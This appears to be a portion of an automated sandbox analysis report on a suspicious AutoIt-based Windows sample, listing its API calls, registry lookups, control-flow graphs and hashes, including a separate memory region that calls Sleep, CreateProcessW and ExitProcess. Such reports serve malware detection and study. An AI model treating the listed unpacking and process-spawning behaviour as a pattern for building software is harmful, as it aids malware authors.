                                                    • Instruction Fuzzy Hash: F3510C75B20209FBDF24DFA4CC49FEE77B9AF48700F108554F60AEA180DA74A684DB60

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2095 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2098 427190-4271ae RegQueryValueExW 2095->2098 2099 40e4eb-40e4f0 2095->2099 2100 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2098->2100 2101 42721a-42722a RegCloseKey 2098->2101 2106 427210-427219 call 436508 2100->2106 2107 4271f7-42720e call 402160 2100->2107 2106->2101 2107->2106
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                    • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: QueryValue$CloseOpen
                                                    • String ID: Include$Software\AutoIt v3\AutoIt
                                                    • API String ID: 1586453840-614718249
                                                    • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                    • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                    • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                    • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2112 410570-4105f1 CreateWindowExW * 2 ShowWindow * 2
                                                    APIs
                                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                    • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                    • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Window$CreateShow
                                                    • String ID: AutoIt v3$edit
                                                    • API String ID: 1584632944-3779509399
                                                    • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                    • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                    • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                    • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2113 401b80-401b96 2114 401b9c-401bb3 call 4013c0 2113->2114 2115 401c7e-401c84 2113->2115 2118 42722b-42723b LoadStringW 2114->2118 2119 401bb9-401bd4 call 402160 2114->2119 2121 427246-427253 call 40e0a0 2118->2121 2124 427258-427275 call 40d200 call 4348de 2119->2124 2125 401bda-401bde 2119->2125 2129 401bf3-401c79 call 412f40 call 412fba call 411567 Shell_NotifyIconW call 402250 2121->2129 2124->2129 2137 42727b-42728f call 40d200 call 4348de 2124->2137 2125->2121 2127 401be4-401bee call 40d200 2125->2127 2127->2129 2129->2115
                                                    APIs
                                                    • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                    • _wcsncpy.LIBCMT ref: 00401C41
                                                    • _wcscpy.LIBCMT ref: 00401C5D
                                                    • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                                                    • String ID: Line:
                                                    • API String ID: 1874344091-1585850449
                                                    • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                    • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                                                    • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                                                    • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                                                    APIs
                                                    • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                    • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                    • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                    • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Close$OpenQueryValue
                                                    • String ID: Control Panel\Mouse
                                                    • API String ID: 1607946009-824357125
                                                    • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                    • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                    • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                    • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                    APIs
                                                    • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                    • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                    • _wcsncpy.LIBCMT ref: 004102ED
                                                    • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                    • _wcsncpy.LIBCMT ref: 00410340
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                    • String ID:
                                                    • API String ID: 3170942423-0
                                                    APIs
                                                      • Part of subcall function 0426C2F0: Sleep.KERNELBASE(000001F4), ref: 0426C301
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0426C527
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateFileSleep
                                                    • String ID: 379Q66155OFYRP8HL28OIS
                                                    • API String ID: 2694422964-1953664903
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID: Error:
                                                    • API String ID: 4104443479-232661952
                                                    APIs
                                                    • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                      • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                      • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                      • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                      • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                      • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                      • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                    • String ID: X$pWH
                                                    • API String ID: 85490731-941433119
                                                    APIs
                                                    • CreateProcessW.KERNELBASE(?,00000000), ref: 0426B095
                                                    • ExitProcess.KERNEL32(00000000), ref: 0426B0B4
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Process$CreateExit
                                                    • String ID: D
                                                    • API String ID: 126409537-2746444292
                                                    APIs
                                                    • _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • _memmove.LIBCMT ref: 00401B57
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                                    • String ID: @EXITCODE
                                                    • API String ID: 2734553683-3436989551
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                    • String ID:
                                                    • API String ID: 1794320848-0
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                    • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentTerminate
                                                    • String ID:
                                                    • API String ID: 2429186680-0
                                                    APIs
                                                    • Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: IconNotifyShell_
                                                    • String ID:
                                                    • API String ID: 1144537725-0
                                                    APIs
                                                    • _malloc.LIBCMT ref: 0043214B
                                                      • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                      • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                                      • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                                    • _malloc.LIBCMT ref: 0043215D
                                                    • _malloc.LIBCMT ref: 0043216F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _malloc$AllocateHeap
                                                    • String ID:
                                                    • API String ID: 680241177-0
                                                    APIs
                                                      • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                                                    • _free.LIBCMT ref: 004295A0
                                                      • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                      • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                      • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                                      • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                                      • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                                      • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                                                    • String ID: >>>AUTOIT SCRIPT<<<
                                                    • API String ID: 3938964917-2806939583
                                                    Strings
                                                    • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                                    Similarity
                                                    • API ID: _strcat
                                                    • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                    • API String ID: 1765576173-2684727018
                                                    APIs
                                                    Similarity
                                                    • API ID: ClearVariant
                                                    • String ID:
                                                    • API String ID: 1473721057-0
                                                    APIs
                                                    • __wsplitpath.LIBCMT ref: 004678F7
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                    • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                                                    Similarity
                                                    • API ID: ErrorLast__wsplitpath_malloc
                                                    • String ID:
                                                    • API String ID: 4163294574-0
                                                    APIs
                                                      • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                                                      • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                                                    • _strcat.LIBCMT ref: 0040F786
                                                      • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                                                      • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                                                    • String ID:
                                                    • API String ID: 3199840319-0
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                                                    • FreeLibrary.KERNEL32(?), ref: 0040D78E
                                                    Similarity
                                                    • API ID: FreeInfoLibraryParametersSystem
                                                    • String ID:
                                                    • API String ID: 3403648963-0
                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                                                    • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    APIs
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    • __lock_file.LIBCMT ref: 00414A8D
                                                      • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                                                    • __fclose_nolock.LIBCMT ref: 00414A98
                                                    Similarity
                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                    • String ID:
                                                    • API String ID: 2800547568-0
                                                    APIs
                                                    • __lock_file.LIBCMT ref: 00415012
                                                    • __ftell_nolock.LIBCMT ref: 0041501F
                                                      • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                    Similarity
                                                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                                                    • String ID:
                                                    • API String ID: 2999321469-0
                                                    APIs
                                                      • Part of subcall function 0426A930: GetFileAttributesW.KERNELBASE(?), ref: 0426A93B
                                                    • CreateDirectoryW.KERNELBASE(?,00000000), ref: 0426B1EF
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AttributesCreateDirectoryFile
                                                    • String ID:
                                                    • API String ID: 3401506121-0
                                                    APIs
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    APIs
                                                    Similarity
                                                    • API ID: _memmove
                                                    • String ID:
                                                    • API String ID: 4104443479-0
                                                    APIs
                                                    Similarity
                                                    • API ID: ProtectVirtual
                                                    • String ID:
                                                    • API String ID: 544645111-0
                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                    • Instruction Fuzzy Hash: 8131F770A00105DBC718DF88E590AAAF7B1FB49310B6486A6E409CF355DB78EDC1CBD9
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                    • Instruction ID: 427b4a632c312742ac0951887501238d3178a51c37fde1d0fd35c98815df3d2a
                                                    • Opcode Fuzzy Hash: e5559574dc10eca8e97d8025a500eef8ee7d185e3c773571fee143e03780f234
                                                    • Instruction Fuzzy Hash: 21119674200201ABDB249F36D984E26B3A5AF45304B244D2FF9C5D7790DB7CE881DB5E
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                    • Instruction ID: fe3c5e01fee558804f1d0cd68762aa03bf47037873853bda5dcd607d85013340
                                                    • Opcode Fuzzy Hash: 35b7bc891c26268d2cb6d46035521dde4ecfc0337a7d2d2d45483da740e67eee
                                                    • Instruction Fuzzy Hash: 2D118B352046019FDB10DF69D884E96B3E9AF8A314F14856EFD298B362CB35FC41CB95
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: __lock_file
                                                    • String ID:
                                                    • API String ID: 3031932315-0
                                                    • Opcode ID: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                    • Instruction ID: 324047821ed349453e17c5e7f52af34d31ade4ebcb64e32b23ce3c6ad3b356a0
                                                    • Opcode Fuzzy Hash: 9d46abaf5bc0bef18357e8259ddf310e5220bee08d011669e2131a09b3543261
                                                    • Instruction Fuzzy Hash: FF011E71801219EBCF21AFA5C8028DF7B71AF44764F11851BF824551A1E7398AE2DBD9
                                                    APIs
                                                    • WriteFile.KERNELBASE(?,?,?,?,00000000,?,?,?,004263D0,?,00487ACC,00000003,0040DE90,?,?,00000001), ref: 00443E54
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: FileWrite
                                                    • String ID:
                                                    • API String ID: 3934441357-0
                                                    • Opcode ID: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                    • Instruction ID: f8d6e32d6ecef3e6c51c5ea05c7ff41eb941b2b6d152ec47b845c679c5cedb0e
                                                    • Opcode Fuzzy Hash: 873a582ac05df194872d3361efdc1b64d97226b1633050e8059638026df5ad0f
                                                    • Instruction Fuzzy Hash: 6BE01276100318ABDB10DF98D844FDA77BCEF48765F10891AFA048B200C7B4EA908BE4
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?), ref: 0426A93B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1246312059.000000000426A000.00000040.00000020.00020000.00000000.sdmp, Offset: 0426A000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_426a000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                    • Instruction ID: 0df45957b5594eb7f82717b7af11429486d0de7114d092f268d85d728bd07ce5
                                                    • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                    • Instruction Fuzzy Hash: 2EE08631726209DBC710CEE888156AD73A4D706320F204654E41BD3180D530B980D658
                                                    APIs
